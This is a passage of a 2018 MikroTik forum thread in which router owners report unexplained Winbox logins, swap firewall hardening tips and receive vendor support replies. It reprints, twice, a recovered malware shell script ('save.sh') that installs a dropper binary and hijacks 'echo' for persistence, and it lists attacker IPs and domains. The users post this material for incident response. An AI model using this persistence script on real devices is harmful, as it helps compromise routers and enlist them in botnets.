Community discussions

 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 10:46 pm

I noticed today an unusual login to my router exposed to external ip.
Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.

Login to my router:
Image

I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
save.sh

Code: Select all

#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
dnstest is a binary file, I can send after contact on pw.


This is not the only case, this is log from my friend. He got only exposed winbox:
Image

It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 10:58 pm

Hi, do you have any firewall setting in your Mikrotik?
You can have a white list ip address to access winbox, by just changing the port for winbox in the services doesn’t mean no one can try to connect to, as well as you can have a black list for the ip that login with login failure, if you don’t have a firewall filter rules, I can send you a default one, with a bit tweaked.
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 11:22 pm

Yes, i got firewall, but winbox port was exposed in the internet.
From it the attack came.
 
Sob
Forum Guru
Forum Guru
Posts: 4806
Joined: Mon Apr 20, 2009 9:11 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:42 am

This looks interesting ... scary interesting.

Send everything to support@mikrotik.com. They will probably notice it here, and if it's real, it will get to them from elsewhere too, but the sooner they get the info, the better.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply.
 
squeeze
Member Candidate
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:45 am

If true, this is a very serious vulnerability and you should report it directly to Mikrotik support so they can fix it ASAP.

Btw, a basic security precaution is to remove or rename the "admin" user and use a different name entirely. There is nothing special about the "admin" name. In this case, it may not be relevant since they logged in with so few attempts.

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.
 
wispmikrotik
Frequent Visitor
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:49 am

Hello everyone,

The same thing happened to me today.

Image

What's happening mikrotik team?
Any security problem not notified?
bug or backdoor?

AS131149 103.1.220.0/23 LJ Hosting Co., LTD
IP Address
103.1.221.29

Hostname
103-1-221-29.static.ip.net.tw

Name Servers
a.g-dns.com
b.g-dns.com
c.g-dns.com

Authority
a.g-dns.com
support@twnoc.net
221.1.103.in-addr.arpa

Network
103.1.221.0/24
AS131149
YUANJHEN-AS-TW Yuan-Jhen Info., Co., Ltd, TW

Designation
APNIC

Location
Banqiao, Taiwan
25.0143, 121.4672
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:52 am

Yes, i got firewall, but winbox port was exposed in the internet.
From it the attack came.
Interesting, and by any chance did you used admin as a user or it was changed?

I think the best way is use whitelist and netinstall the Router.

But before doing that send a supout file to mikrotik.

And the last thing, use strong ssh key.
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:14 am

I just checked most of my Routers, all was ok (6.40.7), but one of them on 6.41.3 had too much attacked but I had rule to collect and block them, no login was established, I believed it a bug in 6.41.3 in firewall filter, I had a whitelist for inbox but looks like it wasn't working, or somehow other rules below it was giving access to any ip to connect to which shouldn't.
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:41 am

just to stop the attackers, create a whitelist IP address for example call Support and the the raw firewall

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support
 
wispmikrotik
Frequent Visitor
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:43 am

I have already notified the mikrotik support, I could not send the support file because the router is blocked.
@normis, mikrotik team can you check this immediately?
this is very serious.
 
wispmikrotik
Frequent Visitor
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:50 am

just to stop the attackers, create a whitelist IP address for example call Support and the the raw firewall

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support
Hello,
I had configured that at 3 attempts d access blocked the ip, but have entered the first with a key of numbers, signs, uppercase and lowercase letters. It is clear that it is a very serious bug that does not require any effort to gain control of the router.
 
User avatar
jspool
Member
Member
Posts: 395
Joined: Sun Oct 04, 2009 4:06 am
Location: Oregon

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 2:01 am

Good catch. Will be interesting to get more details. Unfortunately vulnerabilities are a fact of life these days. For the last ten years I only allow trusted IPs access to Winbox & SSH. Its never a good idea to expose unnecessary things to the Internet in hopes that they will be resilient enough to ward off the ever so persistent probes and attacks. And changing port numbers helps to a point. I suppose if you use a good port scan blocker in your firewall you may be lucky and detect them before they find you. Its always better to restrict to specific networks or only allow access from VPN.
 
User avatar
manuzoli
Frequent Visitor
Frequent Visitor
Posts: 68
Joined: Mon Oct 03, 2016 6:47 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:48 pm

Looks like Mikrotik has sold good engough to become a very promising attack target for the bad guys.

I run an average network (Public C-Network) and I have an average of 215.000 tried attacks per day.
Thats about 2.5 attacks a second. I guess its a good thing to ramp up security and block SSH, HTTP, FTP and especially WINBOX so attackers have no hint that you are using Mikrotik devices.
 
anav
Forum Guru
Forum Guru
Posts: 3120
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 6:45 pm

Do we even know if mikrotik closed this door with 6.42???
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
sindy
Forum Guru
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 6:59 pm

Do we even know if mikrotik closed this door with 6.42???
Likely not as it seems to be a new issue. So disable access to Winbox from the internet, and even better restrict it to just a few addresses from the LAN, until it becomes clear.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
User avatar
JohnTRIVOLTA
Member Candidate
Member Candidate
Posts: 207
Joined: Sun Dec 25, 2016 2:05 pm
Location: BG/Sofia

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 7:38 pm

1.Set user name and password with combination with cyrillic alphabet after that remoove or disable user - admin !
2.Change the port numbers for ssh , winbox etc.
3.Set strog crypto for ssh
4.Set ACL
5.Set 3 attempts login to black list and deny attempts with RAW
6,Disable all other non-useable services
Finaly connect the cable to wan ethernet port!
 
wispmikrotik
Frequent Visitor
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 8:32 pm

1.Set user name and password with combination with cyrillic alphabet after that remoove or disable user - admin !
2.Change the port numbers for ssh , winbox etc.
3.Set strog crypto for ssh
4.Set ACL
5.Set 3 attempts login to black list and deny attempts with RAW
6,Disable all other non-useable services
Finaly connect the cable to wan ethernet port!
In point 1 you're wrong, just like the password type, I had a password of type "@ _23UbakJav!2947!#6hasd! - +)" and they have entered with a single attempt, it is something more serious that lets you see the key, only way to close all the ports to the computers on the LAN.
 
User avatar
IS0FFD
just joined
Posts: 12
Joined: Thu Dec 29, 2016 10:30 pm
Location: Sassari - Sardinia Island ITA

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:04 pm

I had the same visit on three different days...

Image


Image


Image

I noticed that it is from the day after the update 6.42 .... randomness ???

I have set the due rules... I hope!!!!!!
 
Quasar
just joined
Posts: 19
Joined: Sun Oct 05, 2014 1:11 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:13 pm

Can you please upload the 'dnstest' binary? Might provide some clues as to what's going on..
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:45 pm

password: mikrotik
You do not have the required permissions to view the files attached to this post.
 
User avatar
JohnTRIVOLTA
Member Candidate
Member Candidate
Posts: 207
Joined: Sun Dec 25, 2016 2:05 pm
Location: BG/Sofia

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:54 pm

In point 1 you're wrong, just like the password type, I had a password of type "@ _23UbakJav!2947!#6hasd! - +)" and they have entered with a single attempt, it is something more serious that lets you see the key, only way to close all the ports to the computers on the LAN.
Where is the Cyrillic alphabet/s/?
 
Joe1vm
just joined
Posts: 22
Joined: Sat Apr 06, 2013 4:07 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:06 pm

BTW - interesting afternoon - 62 attempts (unique IPs) on ports 22,23,80,8291 within last 3 hours, never seen such wave before....
 
sindy
Forum Guru
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:12 pm

Where is the Cyrillic alphabet/s/?
Why do you think that a password using cyrillic alphabet would be safer than a complex one in pure ASCII, given that there was obviously no brute force attack on the password so the attack must use some security hole bypassing the password authentication or some default password? If so many people would let their complex ASCII passwords leak, it's equally likely that cyrillic passwords could be leaked as well, so it is again no protection. Using exotic alphabets makes dictionary attacks much harder but not those which either don't need a password at all or obtain the correct one some other way.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1717
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:22 pm

@Joe1vm ... only 62 ....
"My" past few days: 56k+ tries ...... :-(
Winbox section drops specified ports and makes list of IP which try for the 2+ times to access that ports.
Same for RAW section which do same for sbl lists. If it is already in RAW list then drop it early to avoid checking 20k+ entries of sbl lists. Second pisture comes from other router.
8291_1.PNG
Last hour ... 87 different IPs scanning my router
8291_2.PNG
You do not have the required permissions to view the files attached to this post.
Real admins use real keyboards.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 10:31 am

Can someone please advice how to check if the router has save.sh and dnstest files? Where are these files saved?

I have been making too many config changes, so unsure something slipped through the cracks.

My winbox, ssh, telnet etc are only accessible from LAN IP ranges but I have PPTP server running. I can see in the log it says lot of established tcp connections for pptp. Is that an issue?
2018-04-22 17_34_23-admin@10.64.98.254 (MKTK3011) - WinBox v6.41.1 on RB3011UiAS (arm).png
This is good right?
2018-04-22 17_35_24-admin@10.64.98.254 (MKTK3011) - WinBox v6.41.1 on RB3011UiAS (arm).png
Do I still need to add firewall rules to close ports?
Thanks!
You do not have the required permissions to view the files attached to this post.
 
Quasar
just joined
Posts: 19
Joined: Sun Oct 05, 2014 1:11 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:00 am

password: mikrotik
Thanks!

dnstest is actually a dropper, it downloads and executes an additional executable which seems to be related to the Reaper botnet: IoT_reaper: A Rappid Spreading New IoT Botnet

It doesn't provide any clue as to how you were infected though.
Can someone please advice how to check if the router has save.sh and dnstest files? Where are these files saved?
They're supposed to end up in /flash/bin/ according to the save.sh script - you can't access them there.
Do I still need to add firewall rules to close ports?
Add an OUTPUT LOG rule for 162.212.182.119. If it hits you're infected. And block Winbox while noone knows what's going on.
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1409
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:16 am

We are sorry to hear that you have experienced such problem. Until now we were not aware about any problems with Winbox and possibility to gain access to your router by using this service. We are now working in order to find out what happened here.

Thank you for those of you who contacted support directly. Those of you who did not, please write to support@mikrotik.com and:

1) Tell RouterOS version which was installed on your device;
2) Tell if Winbox port was protected or anyone could access it;
3) Tell if you did use username admin or was it changed to any other name besides this default name;
4) Tell if password was secure and was not too simple like, for example - "password";
5) Was Winbox configured on default port or port was changed under IP/Services to other value.

While we are looking into this problem:

1) Protect your device (any service) from attacks by using firewall. If you definitely need an open access for some service then either whitelist IP or domain name or use port knocking;
2) Make sure that there is no user called admin on your router configured;
3) Make sure that you change passwords for all the users if there is a chance that your device was affected;
4) Make sure that you are running latest RouterOS version to be sure that this is not a problem which is already resolved in the past.
 
msatter
Forum Guru
Forum Guru
Posts: 1293
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 12:00 pm

@Strods: Make sure that there is no user called admin on your router configured

A lot of us create a new user with that replaces the user Admin and then just disable the user Admin and leave them on the box, but deactivated? Is it better to remove user Admin in case that could be still an attack vector?
Two RB760iGS (hEX S) in series. One does PPPoE and both do IKEv2.
Running:
RouterOS 6.46Beta59 / Winbox 3.20 / MikroTik APP 1.3.7
Having an Android device, use https://github.com/M66B/NetGuard/releases (no root required)
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 12:11 pm

2) Make sure that there is no user called admin on your router configured;
4) Make sure that you are running latest RouterOS version to be sure that this is not a problem which is already resolved in the past.
User admin WAS REMOVED FROM THIS ROUTER. Version 6.41.3
Image
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 1:26 pm

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!
 
sindy
Forum Guru
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 1:54 pm

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!
If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:24 pm

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.
[/quote]

It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from firewall through any of these? Thanks
 
sindy
Forum Guru
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:48 pm

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.
It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from firewall through any of these? Thanks
If you have a serial port on your PC or can provide it using a USB to serial converter, and you either have the RJ-45/DB-9 serial cable or are able to put it together, or you have a "null modem" cable/adaptor and (another) USB to serial converter, then yes, this is the way. You connect to the Mikrotik using any serial terminal software with your normal userame and password and the RouterOS command line is exactly the same like when you connect using ssh or telnet.

RJ45 serial pinouts are not standardized, so make sure you use a Mikrotik-compatible one.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:57 pm

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so :) I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24268
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 3:25 pm

Until we know more, Firewall the Winbox port for unknown IP addresses.
Email any useful information to support@mikrotik.com

Thank you. We are working on it.
No answer to your question? How to write posts
 
sindy
Forum Guru
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 3:29 pm

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so :) I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.
If I had time till tomorrow, I'd myself put together the RJ-45 to DB-9 cable. I don't know your software version and I have got no machine with an embedded serial port, so I'm not sure whether the USB serial port becomes a console one even if a console port already exists in the system and whether your version handles connection of USB to serial converter on the fly (I had some issues when connecting and disconnecting two different USB to serial converters several times.

Apparently the light blue Cisco cable is directly compatible if you have one. Don't know how easily electronic parts are available in your part of the world, but if you don't trust yourself when it comes to use of a soldering iron, there are crimp-type DB-9 available, and the DB-9-to-RJ-45 adaptors are also sold "unconfigured" so you can use a LAN cable and this adaptor and you're good.

And check your terminal software first - connect pins 2 and 3 on the DB-9 and see that what you type on the keyboard appears on the screen when they are connected and doesn't when they are not.


ImageImage
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 4:04 pm

If I had time till tomorrow, I'd myself put together the RJ-45 to DB-9 cable.
Apparently the light blue Cisco cable is directly compatible if you have one.
I think we have Cisco compatible rollover cable hidden away in a cupboard somewhere in the store room; will have to look for it tomorrow.

I don't thnk my DB9 cable and usb converter can be used without some surgery. We do have such expertise(electronics+mechatronics+electrical+controls) in-house if I need it. I could be reasonably dangerous with a soldering iron if it comes to that.

I am confident our old Dell laptop with Windows 2000 will still work so we have HyperTerminal and serial port available. I can still sleep peacefully knowing if I can't get in, no one else could either; hopefully :)

Thanks for your valuable advice.
 
msbr
just joined
Posts: 8
Joined: Thu Sep 17, 2015 10:30 pm
Location: Mendoza
Contact:

winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 7:44 pm

I noticed today an unusual login to my router exposed to external ip.
Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.

Login to my router:
Image

I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
save.sh

Code: Select all

#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
dnstest is a binary file, I can send after contact on pw.


This is not the only case, this is log from my friend. He got only exposed winbox:
Image

It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]


For Security always changes the default ports of service: Winbox, Api


Enviado desde mi iPhone utilizando Tapatalk
 
R1CH
Forum Veteran
Forum Veteran
Posts: 904
Joined: Sun Oct 01, 2006 11:44 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:02 pm


Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.
The VPN still requires exposing to the internet. Given how Mikrotik writes their own VPN daemons, I don't see how a VPN would be more secure than winbox given that almost every Mikrotik daemon seems to have some kind of security bug lately. Hopefully this turns out to be something more mild like a compromised admin PC (eg auto updating winbox is extremely insecure - attacker can send any .exe to be run on your PC) and not a vulnerability in winbox itself.

Update: Checked all my routers with exposed 8291 and nothing untoward in the logs or connections. However winbox only seems to record a log on a successful or failed auth, if this is really an exploit in the daemon (as evidenced by attempt to run a shell script and an executable), such a compromise might not even be logged, and if the malware is stealthy it may never even be visible to the admin post-exploit, since it could trivially erase logs and such. This is another reason why admins should have shell access, without it it's impossible to run forensics checks for the presence of such malware.

Update 2: I've been monitoring connection attempts to 8291 with ~30 IPs, not a single SYN packet in the last two hours, so doesn't look like there's a worm or mass scan going on.
 
squeeze
Member Candidate
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 1:25 am

Do any of these affected routers have the UPnP service enabled at all, including on LAN?
 
quangvu37
just joined
Posts: 2
Joined: Thu Sep 10, 2015 11:42 am

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 6:43 am

Hi Mikrotik Team,

We also observed this issue on some of our Devices, even if the hacked account is not 'admin'.
Image

The Device is RB1100AHx2 with RouterOS v6.41.4!

Kindly help us to check this vulnerability soon.

Thanks!
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1409
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 8:11 am

Everyone who seems to be affected (did see failed login attempts from unknown IP which in the end resulted in successful login attempt) and did see these files created on the router - please write to support@mikrotik.com. Send to us supout file from your router. If it would be possible to get remote access to your router, then it would be the best way how we can try to determine in what way attacker did gain access to your router.
 
blingblouw
Member Candidate
Member Candidate
Posts: 273
Joined: Wed Aug 25, 2010 9:43 am

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 10:56 am

Are all these attacks coming from the same source?

103.1.221.39
 
User avatar
honzam
Forum Guru
Forum Guru
Posts: 2293
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 12:43 pm

@mikrotik
Maybe it's time to issue a warning to main page of Forum?

On Czech forum: https://ispforum.cz/viewtopic.php?p=228818#p228818
On Polish forum: https://www.trzepak.pl/viewtopic.php?f=26&p=487659
LAN, FTTx, Wireless. ISP operator
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24268
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers  [SOLVED]

Mon Apr 23, 2018 1:06 pm

No answer to your question? How to write posts

Who is online

Users browsing this forum: Google [Bot] and 120 guests